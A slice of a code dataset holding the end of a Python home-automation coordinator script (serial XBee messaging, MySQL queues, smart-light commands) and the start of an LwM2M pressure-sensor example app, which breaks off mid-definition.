INString\n\tglobal IXString\n\tglobal ISString\n\tglobal IAString\n\tglobal IMString\n\t\n\tcur = db.cursor()\n\t\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin building string to send out-------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t# set numbers of parameters to build the string to send to the coordinator \t\n\t# count the number of nodes \n\tsql = \"select count(*) as CNT from vwnodes WHERE nodetype != 0\" #exclude external node\n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tnodeNum=parseint(\"{}\".format(CNT))\n\t\tINString = INString + str(nodeNum*pnum)\n\tsql = \"select count(*) as CNT from vwnodes WHERE nodetype = 2\" #xbee nodes\n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tnodeNum=parseint(\"{}\".format(CNT))\n\t\tIXString = IXString + str(nodeNum)\n\t# retrieve node data and buid initialization strings\n\tsql = \"select id, xbee_high_address, xbee_low_address, nodetype from vwnodes WHERE nodetype != 0 AND status = 1 order by id\" \n\tcur.execute(sql)\n\tfor (id, xbee_high_address, xbee_low_address, nodetype) in cur:\t\t\t\n\t\tINString = INString + \",\" + \"{}\".format(id) + \",\" + \"{}\".format(nodetype) + \",0,0,1\"\n\t\tif int(\"{}\".format(nodetype)) == 2: #xbee \n\t\t\tIXString = IXString + \",\" + \"{}\".format(id) + \",\" + \"{}\".format(xbee_high_address) + \",\" + \"{}\".format(xbee_low_address)\n\t#db.commit()\n\t# count the number of sensors \n\tsql = \"select count(*) as CNT from vwsensors where tbNodeType_id != 0\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tsensorNum=parseint(\"{}\".format(CNT))\n\t\tISString = ISString + str(sensorNum*pnum)\n\tdb.commit()\n\t#//col 0=node 1=sensor 2=value 3=alarm 4=spare\t\n #retrieve sensor data and build initialization strings\n\tsql = \"SELECT nodeid,tbnodetype_id,tbsensortype_id,pin_number FROM vwsensors where tbnodetype_id != 0 and tbstatus_id = 1 order by nodeid,pin_number\" \n\tcur.execute(sql)\n\tfor (nodeid,tbnodetype_id,tbsensortype_id,pin_number) in cur:\t\t\t\n\t\t\tISString = ISString + \",\" + \"{}\".format(nodeid) + \",\" + \"{}\".format(pin_number) + \",0,0,0\"\t\n\t#db.commit()\n\t# count the number of actuators \n\tsql = \"select count(*) as CNT from vwactuator\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tactuatorNum=parseint(\"{}\".format(CNT))\n\t\tIAString = IAString + str(actuatorNum*pnum)\t\n\tdb.commit()\n\t#//col 0=node 1=sensor 2=value 3=alarm 4=spare\t\n #retrieve actuator data and build initialization strings\n\tsql = \"select tbnode_id,pinnumber from tbactuator order by tbnode_id,pinnumber\" \n\tcur.execute(sql)\n\tfor (tbnode_id,pinnumber) in cur:\t\t\t\n\t\t\tIAString = IAString + \",\" + \"{}\".format(tbnode_id) + \",\" + \"{}\".format(pinnumber) + \",0,0,0\"\n\t\t\t\t\t\n\t# count the number of methods \n\tsql = \"select count(*) as CNT from vwmethods\" \n\tcur.execute(sql)\n\tfor (CNT) in cur:\n\t\tmethodNum=parseint(\"{}\".format(CNT))\n\t\tIMString = IMString + str(methodNum*pnum)\t\n\tdb.commit()\n\t#//col 0=node 1=actuator 2=method 3=value 4=spare\t\n #retrieve method data and build initialization strings\n\tsql = \"select tbnode_id,pinnumber,method from vwmethods order by tbnode_id,pinnumber,method\" \n\tcur.execute(sql)\n\tfor (tbnode_id,pinnumber,method) in cur:\t\t\n\t\t\tIMString = IMString + \",\" + \"{}\".format(tbnode_id) + \",\" + \"{}\".format(pinnumber) + \",\" + \"{}\".format(method) + \",0,0\"\t\t\t\n\tdb.commit()\t\n\tcur.close\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----end building string to send out---------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin Sending init string to the coordinator -------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\toutput(\"Init sensors\")\n\tret = initSendStringsToCoordinator(ISString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init actuators\")\n\t#output(IAString)\n\tret = initSendStringsToCoordinator(IAString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init methods\")\n\tret = initSendStringsToCoordinator(IMString) \n\tif ret == 0: #if fails\n\t\treturn 0\t\t\n\toutput(\"Init nodes\")\n\tret = initSendStringsToCoordinator(INString) \n\tif ret == 0: #if fails\n\t\treturn 0\n\toutput(\"Init node addresses Xbee\")\n\tret = initSendStringsToCoordinator(IXString) \n\tif ret == 0: #if fails\n\t\treturn 0\t\t\n\t#--------------------------------------------------------------------------------------------------------#\n\t#----end Sending init string to the coordinator ---------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t# if Ok\n\tcur.close\n\toutput (\"End Initializing\")\n\treturn 1\n\t\ndef isResponse(response):\n\tif \"CX0\" in str(response, 'utf-8'):\n\t\treturn True\n\telif \"CX1\" in str(response, 'utf-8'):\t\n\t\treturn True\n\telse:\n\t\treturn False\t\n\t\t\ndef isResponseOK(response):\n\tprint(response)\n\tres = False\n\tif \"CX0\" in str(response, 'utf-8'):\n\t\tprint(1)\n\t\tres = False\n\telif \"CX1\" in str(response, 'utf-8'):\t\n\t\tprint(2)\n\t\tres = True\n\telse:\n\t\tprint(3)\n\t\tres = False\t\n\tprint(\"qqq:\")\t\n\t#print(\"xx:\", str(response))\n\treturn res\t\t\t\n\n#--------------------------------------------------------------------------------------------------------#\n#---- get serial incoming data ---------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\ndef getSerialData(qDataIn, qDataOut, qResponse):\n\tserCoord.flushInput()\n\treadSerial = \"\"\n\tserCoord.timeout = 1\n\twhile True:\n\t\t#output(\"Waiting for data on serial\")\n\t\tserialBuffer = serCoord.inWaiting()\n\t\tif serialBuffer > 0: #data available on serial\n\t\t\treadSerial = serCoord.readline()\n\t\t\treadSerial.rstrip(endSerialChars)\n\t\t\toutput(\"Data received from serial\")\n\t\t\tif isResponse(readSerial) == True:\n\t\t\t\twhile not qResponse.empty():\n\t\t\t\t\tqResponse.get()\n\t\t\t\tqResponse.put(readSerial)\n\t\t\t\toutput(\"Response received\")\t\t\t\n\t\t\telse:\t\n\t\t\t\tqDataIn.put(readSerial)\t\n\t\t\t\t#print(\"Data received:\", serialBuffer)\n\t\t\t\t#print(\"Q size:\", qDataIn.qsize()) \t\n\n\t\tif not qDataOut.empty():\n\t\t\t#print(\"Q OUT size:\", qDataOut.qsize()) \n\t\t\tstg = qDataOut.get()\n\t\t\tserCoord.write(bytes(stg, 'UTF-8')) \n\t\t\toutput(\"String: \" + str(stg))\n\n\t\t\t\t\n#--------------------------------------------------------------------------------------------------------#\n#---- Receive data from coordinator ---------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\n\t\ndef AUTOreceiveDataFromCoordinator(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1): # CR0=sensors CR1=nodes CR3=Actuators CR5=All CommExecutedTrue = \"CX1\" CommExecutedFalse = \"CX0\"\n\tglobal endSerialChars\n\tif not qDataIn.empty(): # if there is data to process\n\t\treadSerial = qDataIn.get()\t\n\t\tarrayData = str(readSerial).split(',')\n\t\toutput(\"Parsing received data: \" + str(len(arrayData)))\n\t\tdNum = int((len(arrayData)-1)/(pnum+1))\n\t\tif dNum != 0: #if data received on serial\n\t\t\t#--- Write data to database ---#\n\t\t\tsql = \"\"\n\t\t\tif (parseint(arrayData[0])) != 99: #check the first value if is NOT 99 = smartlight command\t\n\t\t\t\tsql = \"insert into tbdatain (timekey,type,\" \n\t\t\t\tx = 0\n\t\t\t\twhile x < pnum-1:\n\t\t\t\t\tsql = sql+ \"V\" + str(x) + \",\"\t\n\t\t\t\t\tx = x+1\n\t\t\t\telse:\t\n\t\t\t\t\tsql = sql+ \"V\" + str(x)\t+ \") values \"\t\n\t\t\t\t# create Value part of insert statement\t\t\t\t\n\t\t\t\tfor i in range(0, dNum):\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 0:\n\t\t\t\t\t\tsql = sql+ \"(millis(),1\" # sensor\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 1:\n\t\t\t\t\t\tsql = sql+ \"(millis(),0\" # node\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 3:\n\t\t\t\t\t\tsql = sql+ \"(millis(),2\" # actuator\t\n\t\t\t\t\tif (parseint(arrayData[i*(pnum+1)])) == 9:\n\t\t\t\t\t\tsql = sql+ \"(millis(),9\" # method\t\t\n\t\t\t\t\tfor v in range((i*(pnum+1))+1, (i*(pnum+1))+pnum+1):\t\t\t\t\t\n\t\t\t\t\t\tsql = sql + \",\" + str(parseint(arrayData[v])) + \"\"\n\t\t\t\t\tsql = sql + \")\"\t\n\t\t\t\t\tif i != dNum-1:\n\t\t\t\t\t\tsql = sql + \",\"\t\t\t\t\t\n\t\t\telif (parseint(arrayData[0])) == 99: #smart light command\n\t\t\t\toutput(\"Ricevuto comando luci\")\n\t\t\t\t# get the smartlight_id\n\t\t\t\tnode = str(parseint(arrayData[1]))\n\t\t\t\tpin = str(parseint(arrayData[2]))\n\t\t\t\tsts = str(parseint(arrayData[3]))\n\t\t\t\tdim = str(parseint(arrayData[4]))\n\t\t\t\tcolor = str(parseint(arrayData[5]))\n\t\t\t\tdev_type = 0\n\t\t\t\tif pin != \"0\": #it is a light 0 = group\n\t\t\t\t\tdev_type = 1\n\t\n\t\t\t\twhile not qResult1.empty(): #attendo risutato\n\t\t\t\t\trow = qResult1.get()\n\t\t\t\t\tsmartlight_id = int(row[0])\n\t\t\t\t\tactuator_id = int(row[1])\n\t\t\t\t\tnode_id = int(row[2])\n\t\t\t\t\tpinnumber = int(row[3])\t\n\t\t\t\t\t\n\t\t\t\t\tif int(pin) == int(pinnumber) and int(node) == int(node_id):\t\t\t\n\t\t\t\t\t\t#millis\n\t\t\t\t\t\t#type always=0, for future use\n\t\t\t\t\t\t#V0=pin\n\t\t\t\t\t\t#V1=status\n\t\t\t\t\t\t#V2=value\n\t\t\t\t\t\t#V3=color/mood\n\t\t\t\t\t\t#V4=actuator_id\n\t\t\t\t\t\t#V5=smartlight_id\n\t\t\t\t\t\t#V6=type\n\t\t\t\t\t\t#V7=command origin 99=switch\n\t\t\t\t\t\tsql = \"insert into tbdataoutsmartlight (timekey,type,V0,V1,V2,V3,V4,V5,V6,V7) values \" \n\t\t\t\t\t\t# create Value part of insert statement\t\t\n\t\t\t\t\t\tsql = sql+ \"(millis(),0\" # action type 1 set color\n\t\t\t\t\t\tsql = sql+ \",\" + str(pin) \n\t\t\t\t\t\tsql = sql+ \",\" + sts\n\t\t\t\t\t\tsql = sql+ \",\" + dim\n\t\t\t\t\t\tsql = sql+ \",\" + color #color/mood\t\n\t\t\t\t\t\tsql = sql+ \",\" + str(actuator_id)\t \n\t\t\t\t\t\tsql = sql+ \",\" + str(smartlight_id) \n\t\t\t\t\t\tsql = sql+ \",\" + str(dev_type) + \",99)\"\n\t\t\t\t\t\t#print(sql)\t\t\t\t\t\t\t\t\t\t\n\t\t\t# execute sql\n\t\t\tqSQL.put(sql)\n\treturn\n\t\t\t\n#--------------------------------------------------------------------------------------------------------#\n#---- End AUTOreceiveDataFromCoordinator --------------------------------------------------------------------#\n#--------------------------------------------------------------------------------------------------------#\n\ndef initSendStringsToCoordinator(stg): \n\tserCoord.flushInput()\n\toutput(stg)\n\t# send the node string\n\tattemptsCnt = 0\n\twhile serCoord.inWaiting() == 0 and attemptsCnt < 5:\n\t\tret = serCoord.write(bytes(stg, 'UTF-8')) \n\t\treadSerial = serCoord.readline()\n\t\tif readSerial == CommExecutedTrue:\n\t\t\treturn 1\n\t\t\ttime.sleep(0.2)\n\t\t\tbreak\n\t\telif readSerial == CommExecutedFalse:\n\t\t\t# write error in log\n\t\t\tlog(\"E\", \"Error \"+stg)\n\t\telse:\n\t\t\tattemptsCnt = attemptsCnt + 1\n\t\t\toutput(attemptsCnt)\n\t\t\tcontinue\n\t# write error in log\n\tlog(\"E\", \"no serial available\")\n\treturn 0\n\ndef sendCommand(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2): \n\t#--------------------------------------------------------------------------------------------------------#\n\t#----begin building string to send out-------------------------------------------------------------------#\n\t#--------------------------------------------------------------------------------------------------------#\n\t#0=set trigger\n\t#1=delete local trigger \n\t#2=set actuator \n\t#3=reset remote trigger\n\t#4=set remote trigger\n\t#5=delete remote trigger\n\t#6=set time\n\t#7=set meteo\n\t#8=set meteo forecast\n\t#9=set meteo forecast temp\n\t#10=set smartlight\n\tif qResult2.qsize() > 0: #attendo risutato\n\t\trow = qResult2.get()\n\t\ttimekey = row[0]\n\t\ttype = int(row[1])\n\t\tV0 = str(row[2])\n\t\tV1 = str(row[3])\n\t\tV2 = str(row[4])\n\t\tV3 = str(row[5])\n\t\tV4 = str(row[6])\n\t\tV5 = str(row[7])\n\t\tV6 = str(row[8])\n\t\tV7 = str(row[9])\n\t\tV8 = str(row[10])\n\t\tV9 = str(row[11])\n\t\tV10 = str(row[12])\n\t\tif type == 0:\n\t\t\toutput(\"Set trigger\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 1:\n\t\t\toutput(\"Reset trigger\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 2:\n\t\t\toutput(\"Set actuator\")\n\t\t\tstg = \"CW,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 3:\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",0,0,0,0,0,0,0\"\n\t\tif type == 4:\n\t\t\toutput(\"Set remote triggers\")\n\t\t\t## 0=sensor number \n\t\t\t## 1=immediate alarm 1=permanent 2=temporary 3=flipflop\n\t\t\t## 2=actuator \n\t\t\t## 3=level min\n\t\t\t## 4=status \n\t\t\t## 5=current value\n\t\t\t## 6=level max\n\t\t\t## 7=output type 0=analog 1=digital\n\t\t\t## 8=action out of range\n\t\t\t## 9=action in range\n\t\t\t## 10=timer time\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",0,\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 + \",\" + V9 + \",\" + V10\n\t\tif type == 5:\n\t\t\toutput(\"Deleting remote trigger\")\n\t\t\tstg = \"CA,\" + V0 + \",\" + V1 + \",0,0,0,0,0,0,0,0,0,0\"\t\n\t\tif type == 6:\n\t\t\toutput(\"Set time\")\n\t\t\tstg = \"CT,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 \n\t\tif type == 7:\n\t\t\toutput(\"Set meteo\")\n\t\t\tstg = \"CM,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 \n\t\tif type == 8:\n\t\t\toutput(\"Set meteo forecast\")\n\t\t\tstg = \"CF,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 \n\t\tif type == 9:\n\t\t\toutput(\"Set meteo forecast temperature\")\n\t\t\tstg = \"CG,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 \t\t\t\t\n\t\tif type == 10:\n\t\t\toutput(\"Set smartlight commands\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 sts\n\t\t\t#V3 value\n\t\t\t#V4 color/mood\n\t\t\tstg = \"CC,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4\n\t\tif type == 11:\n\t\t\toutput(\"Setup smartlight configuration (all device type)\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 type\n\t\t\t#V3 mode 0=insert 1=delete 2=update\n\t\t\tstg = \"CD,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 \t\t\t\t\t\t\t\t\n\t\tif type == 12:\n\t\t\toutput(\"Setup smartlight configuration group MOODs\")\n\t\t\t#V0 node\n\t\t\t#V1 pin\n\t\t\t#V2 group pin\n\t\t\t#V3 mood1\n\t\t\t#V4 mood2\n\t\t\t#V5 ...\n\t\t\tstg = \"CE,\" + V0 + \",\" + V1 + \",\" + V2 + \",\" + V3 + \",\" + V4 + \",\" + V5 + \",\" + V6 + \",\" + V7 + \",\" + V8 + \",\" + V9 + \",\" + V10\n\t\t#-- common part --#\n\t\t#-- Try until 3 times to transmit --#\n\t\tfor i in range(3):\t\n\t\t\t# send the string\n\t\t\tqDataOut.put(stg)\n\t\t\toutput(\"Waiting for the response for attempt \" + str(i))\n\t\t\t#print(\"stampa stringa:\", stg)\n\t\t\tsResponse = \"empty\"\n\t\t\tinitTime = time.time() + 3 #set timeout for the next loop\n\t\t\tloop = 0\n\t\t\twhile loop == 0: #data available on serial\n\t\t\t\tif initTime < time.time():\n\t\t\t\t\toutput(\"Tempo scaduto\")\n\t\t\t\t\tloop = 1\n\t\t\t\tif not qResponse.empty():\n\t\t\t\t\tsResponse = qResponse.get()\n\t\t\t\t\tloop = 1\n\t\t\tif sResponse == CommExecutedTrue: #good response, transmission Ok\n\t\t\t\toutput (\"Response OkOkOkOKOkOkOk\")\n\t\t\t\tbreak\n\t\t\telse: #bad response\t\t\n\t\t\t\toutput (\"Error. trying again....\")\t\t\n\t\t\t\t\n\t\t\t#if isResponseOK(sResponse) == True: #good response, transmission Ok\n\t\t\t#\toutput (\"Response OkOkOkOKOkOkOk\")\n\t\t\t#\tbreak\n\t\t\t#else: #isResponseOK(sResponse) == False: #bad response\t\t\n\t\t\t#\toutput (\"Error. trying again....\")\t\t\n\treturn\n\t\ndef runP2(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1):\n\twhile True:\n\t\tAUTOreceiveDataFromCoordinator(qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1)\n\t\ttime.sleep(0.1)\n\t\t\ndef runP3(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2):\n\twhile True:\n\t\tsendCommand(qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2)\n\t\ttime.sleep(0.1)\n\t\t\ndef execSQL(qSQL, qQuery1, qResult1, qQuery2, qResult2):\n\tcur = db.cursor()\n\tcurX = db.cursor()\n\twhile True:\n\t\ttry:\n\t\t\tif not qSQL.empty():\n\t\t\t\tsql = qSQL.get()\n\t\t\t\tinssql = \"UPDATE tbqueue SET timekey = millis(), code = '\" + sql + \"'\"\n\t\t\t\tcur.execute(inssql)\n\t\t\t\tdb.commit()\n\t\t\t\t#print(\"command executed:\", inssql)\n\t\t\t\t#print(\"Command executed\")\n\t\t\t\t\n\t\t\tif qResult1.empty():\n\t\t\t\tsql = \"SELECT smartlight_id, tbactuator_id, tbnode_id, pinnumber FROM vwsmartlight\"\n\t\t\t\tcur.execute(sql)\n\t\t\t\trow = cur.fetchone()\n\t\t\t\twhile row is not None:\t\n\t\t\t\t\tqResult1.put(row)\n\t\t\t\t\trow = cur.fetchone()\n\t\t\t#print(\"qResult1 size:\", qResult1.qsize())\t\t\t\n\n\t\n\t\t\tif qResult2.empty():\n\t\t\t\tsql = \"select timekey,type,V0,V1,V2,V3,V4,V5,V6,V7,V8,V9,V10 from tbdataout order by timekey asc\"\n\t\t\t\tcur.execute(sql)\n\t\t\t\trow = cur.fetchone()\n\t\t\t\twhile row is not None:\t\t\t\t\t\t\t\n\t\t\t\t\tqResult2.put(row)\n\t\t\t\t\tsql = \"delete from tbdataout where timekey = \" + str(row[0])\n\t\t\t\t\tcurX.execute(sql)\n\t\t\t\t\trow = cur.fetchone()\n\t\t\t\tdb.commit\n\t\t\t\n\t\t\tif qResult2.qsize() > 0:\t\t\t\n\t\t\t\toutput(\"Commands to send: \" + str(qResult2.qsize()))\t\t\t\n\t\t\t\t\n\t\texcept mysql.connector.Error as err:\n\t\t\toutput(\"SQL error: {}\".format(err))\t\n\t\ttime.sleep(0.1)\t\t\n\t\t\ndef Main():\n\n\tpool = mp.Pool()\n\tmanager = mp.Manager()\n\n\t# create managed queues\t\n\tqDataIn = manager.Queue()\n\tqDataOut = manager.Queue()\n\tqResponse = manager.Queue()\n\tqQuery1 = manager.Queue()\n\tqQuery2 = manager.Queue()\n\tqResult1 = manager.Queue()\n\tqResult2 = manager.Queue(maxsize=0)\n\tqSQL = manager.Queue()\n\t\n\tp1 = pool.apply_async(getSerialData, (qDataIn, qDataOut, qResponse))\n\tp2 = pool.apply_async(runP2, (qDataIn, qDataOut, qResponse, qSQL, qQuery1, qResult1))\n\tp3 = pool.apply_async(runP3, (qDataIn, qDataOut, qResponse, qSQL, qQuery2, qResult2))\n\tp4 = pool.apply_async(execSQL, (qSQL, qQuery1, qResult1, qQuery2, qResult2))\n\n\tpool.close()\n\tpool.join()\n \n\treturn\t\t\t\t\n\n#------- Main section ----------------------------#\n#------- Run once --------------------------------#\nlog(\"I\", \"Initialize coordinator\")\nret = 0\ncurInit = db.cursor()\n#truncate output tables\ncurInit.callproc('init')\ncurInit.close()\nwhile ret == 0:\n\tINString = \"IN\" # to send Node data to the coordinator\n\tISString = \"IS\" # to send Sensor data to the coordinator\n\tIXString = \"IX\" # to send Address data to the coordinator\n\tIAString = \"IA\" # to send Actuators data to the coordinator\n\tIMString = \"IM\" # to send Methods data to the coordinator\n\tret = initCoordinator()\n\tret = 1\n#------- End run once -------------------------#\nlog(\"I\", \"Start main loop\")\n\n\nif __name__ == \"__main__\":\n\tMain()\n \n\n\n\n","sub_path":"Python/dhproc/main_NEW.py","file_name":"main_NEW.py","file_ext":"py","file_size_in_byte":21003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"101911618","text":"#!/usr/bin/python\n\"\"\" Example app for the Morpheus. \n The main purpose of this example app is to demonstrate the use of the ETC Python Lwm2m Module and the ETC Api Client Module.\n This example will connect to an lwm2m server and register a Pressure Sensor Object. It demonstrates how to define resources, instances, \n and objects use the Python lwm2m library and how to start the client.\n The ETC API module is used to interface with the hardware and acquire the lwm2m connection information. The app uses the API module to:\n * set the sensor power pin high\n * read from an analog input pin to get the voltage of a pressure sensor\n * Read the analog process data, which is then used to calculate the pressure value from the raw voltage\n * Acquire the lwm2m uri, public key, and private key\n\n Required Hardware:\n * Name: senpwr. This will be on the PWR output and is used to power the sensor\n * Name: ai1. This will read the pressure sensor output.\n \n The names senpwr and ai1 are setup at build time in the Morpheus App Builder program.\n\"\"\"\nimport Lwm2m\nfrom Lwm2m import lwm2m_client\nfrom Lwm2m import ReadResource\nfrom Lwm2m import WriteResource\nfrom Lwm2m import ReadWriteResource\nfrom Lwm2m import ExecuteResource\nfrom Lwm2m import STRING\nfrom Lwm2m import INT\nfrom Lwm2m import FLOAT\nfrom Lwm2m import OPAQUE\nfrom Lwm2m import BOOL\n\n# The ETC API module. Used to interface to hardware, retrieve analog process configuration values, and get lwm2m connection info.\nfrom api_client import return_values\nfrom api_client import analog\nfrom api_client import digital\nfrom api_client import lwm2m\n\nimport logging\nimport binascii\n \nlogger = logging.getLogger(\"pressure\") \nch = logging.StreamHandler() \nch.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\nlogger.addHandler(ch)\n\n#=========================================================#\ndef enable_sensor_power():\n \"\"\" Sets the output on the SENPWR output high.\"\"\"\n sen = digital.SensorPower(\"senpwr\") \n sen.set()\n \ndef get_analog_process_config():\n \"\"\" Calls the read_analog_process_config API client function to retrieve the min/max values of the sensor voltage and corresponding PSI.\n These values are used to calculate the PSI from the voltage output. \n Exceptions are returned if the read_analog_process_config function returns an error or if the returned value is cannot be parsed.\"\"\"\n response, value = analog.read_analog_process_config('ai1')\n \n if response != return_values.RESULT_SUCCESS:\n raise Exception(\"Failed to retrieve the analog process config information. Return value {}.\".format(response))\n \n try:\n max_volts = float(value[\"max_voltage\"]) \n min_volts = float(value[\"min_voltage\"]) \n min_sen = float(value[\"min_sensor\"]) \n max_sen = float(value[\"max_sensor\"])\n except KeyError:\n raise Exception(\"The analog process config message received from the api server is not in the expected format. Unable to proceed.\")\n \n return max_volts, min_volts, max_sen, min_sen \n \ndef read_lwm2m_info():\n \"\"\" Uses the get_lwm2m_security_info API function to get the endpoint URI, the secret key and the secret key used to connect to the lwm2m server.\"\"\"\n response, secure = lwm2m.get_lwm2m_security_info()\n \n if response != return_values.RESULT_SUCCESS:\n raise Exception(\"Failed to retrieve the lwm2m connection information. Return value {}.\".format(response))\n try:\n lwm2m_uri = \"coaps://\" + secure[\"LWM2M_HOST_NAME\"] + \":5684\"\n lwm2m_endpoint = secure[\"LWM2M_ENDPOINT\"]\n lwm2m_identity = secure[\"LWM2M_IDENTITY\"]\n lwm2m_security = secure[\"LWM2M_SECRET_KEY\"]\n except KeyError:\n raise Exception(\"The lwm2m security info message received from the api server is not in the expected format. Unable to proceed.\")\n \n return lwm2m_uri, lwm2m_endpoint, lwm2m_identity, lwm2m_security\n\nclass PressureSensor:\n \"\"\" A class to read the pressure sensor voltage from a analog input and interpolatte it to a PSI value.\"\"\"\n def __init__(self):\n self.max_volts, self.min_volts, self.max_sen, self.min_sen = get_analog_process_config()\n self.ai1 = analog.AI(\"ai1\") \n\n def read_psi(self):\n ''' This function uses the equation y = mx+b to convert the voltage to a pressure value.'''\n x = float(self.ai1.read_milli_volts()) / 1000.0\n m = (self.max_sen - self.min_sen) / (self.max_volts - self.min_volts)\n b = self.min_sen - ((self.max_sen - self.min_sen)/(self.max_volts - self.min_volts))*self.min_volts\n y = m * x + b \n logger.debug(\"read_psi called: x = {}, m = {}, b = {}, y = {}\".format(x,m,b,y))\n # The return value is clamped between the min and max values of the sensor\n return min( self.max_sen, max(self.min_sen, y ))\n\n\nclass ServerInstance(Lwm2m.Instance):\n \"\"\" A class that represents an lwm2m Server object. This is a manadatory lwm2m object. The class must inherit from the lwm2m.Instance class.\"\"\"\n # These are the resource ids \n SHORT_ID = 0\n LIFETIME = 1\n MIN_PERIOD = 2\n MAX_PERIOD = 3\n DISABLE_ID = 4\n TIMEOUT_ID = 5\n STORING_ID = 6\n BINDING_ID = 7\n UPDATE_ID = 8 \n \n def __init__(self, instance_id):\n # The init function for the Lwm2m.Instance base class must always be called.\n Lwm2m.Instance.__init__(self, instance_id)\n \n resources = [\n ReadResource(self.SHORT_ID, INT, 123),\n ReadWriteResource(self.LIFETIME, INT, 30),\n ReadWriteResource(self.MIN_PERIOD, INT, 0),\n ReadWriteResource(self.MAX_PERIOD, INT, 0),\n ReadWriteResource(self.DISABLE_ID, INT, 0),\n ExecuteResource(self.TIMEOUT_ID),\n ReadWriteResource(self.STORING_ID, BOOL, False),\n ReadWriteResource(self.BINDING_ID, STRING, \"U\"),\n ExecuteResource(self.UPDATE_ID)\n ]\n # register must be called to inform the lwm2m.Instance of the resources it contains.\n self.register(resources)\n\n\nclass PressureValue(Lwm2m.ReadResource): \n \"\"\" This class represents an lwm2m pressure value resource. The class must inherit from Lwm2m.ResourceBase in order to be used by the\n client. Since this a read resource, the class must provide a read callback function. The callback must have the name 'read' and return\n a value of type float since this is an Lwm2m.FLOAT resource. \"\"\"\n def __init__(self, pressure_sensor, *arg):\n # The init function for the Lwm2m.ResourceBase base class must always be called.\n Lwm2m.ReadResource.__init__(self, *arg)\n self.pressure_sensor = pressure_sensor\n \n def read(self):\n \"\"\"This function is used as a callback by the lwm2m client.\"\"\"\n # One method of getting a resource is calling get_resource from the client instance. get_resource\n # takes the lwm2m uri string as a parameter. The uri is the object id, then the instance id, then\n # the resource id.\n max_resource = lwm2m_client.get_resource(\"3323/1/5602\")\n # Resources can also be accessed using the index operator from the client instance.\n min_resource = lwm2m_client[3323][1][5601]\n \n pressure = self.pressure_sensor.read_psi()\n \n max_resource.value = max(max_resource.value, pressure)\n min_resource.value = min(min_resource.value, pressure)\n logger.debug(\"PressureValue read called: pressure = {}, max = {}, min = {}\".format(pressure, max_resource.value, min_resource.value))\n return pressure\n\nclass Reset_min_max(ExecuteResource):\n \"\"\" This class represents an lwm2m min/max reset resource. The class must inherit from Lwm2m.ExecuteResource in order to be used by the\n client. Since this an execute resource, the class must provide an execute callback function. The callback must have the name 'execute', and \n take one argument that contains any data sent from the server as part of the execute request. The function should return a boolean value\n that indicates the success of the operation.\"\"\"\n def __init__(self, pressure_sensor, *arg):\n ExecuteResource.__init__(self, *arg)\n self.pressure_sensor = pressure_sensor\n \n def execute(self, data):\n pressure = self.pressure_sensor.read_psi()\n # An attribute named parent_instance is set by the instance that owns the resource when the\n # resource is registered. This gives a convenient way to access other resources of the same\n # instance.\n lwm2m_client[3323][1][5601].value = pressure\n lwm2m_client[3323][1][5602].value = pressure\n return True\n\n\nclass PressureObjectInstance(Lwm2m.Instance):\n # These are the resource ids\n MIN_PRESSURE = 5601\n MAX_PRESSURE = 5602\n MIN_PRESSURE_RANGE = 5603\n MAX_PRESSURE_RANGE = 5604\n RESET_VALUES = 5605\n LINE_PRESSURE = 5700\n SENSOR_UNITS = 5701\n CURRENT_CALIBRATION = 5821\n APPLICATION_TYPE = 5750\n \n def __init__(self, instance_id):\n # The init function for the Lwm2m.Instance base class must always be called.\n Lwm2m.Instance.__init__(self, instance_id)\n self.pressure_sensor = PressureSensor()\n pressure = self.pressure_sensor.read_psi()\n \n resources = [\n 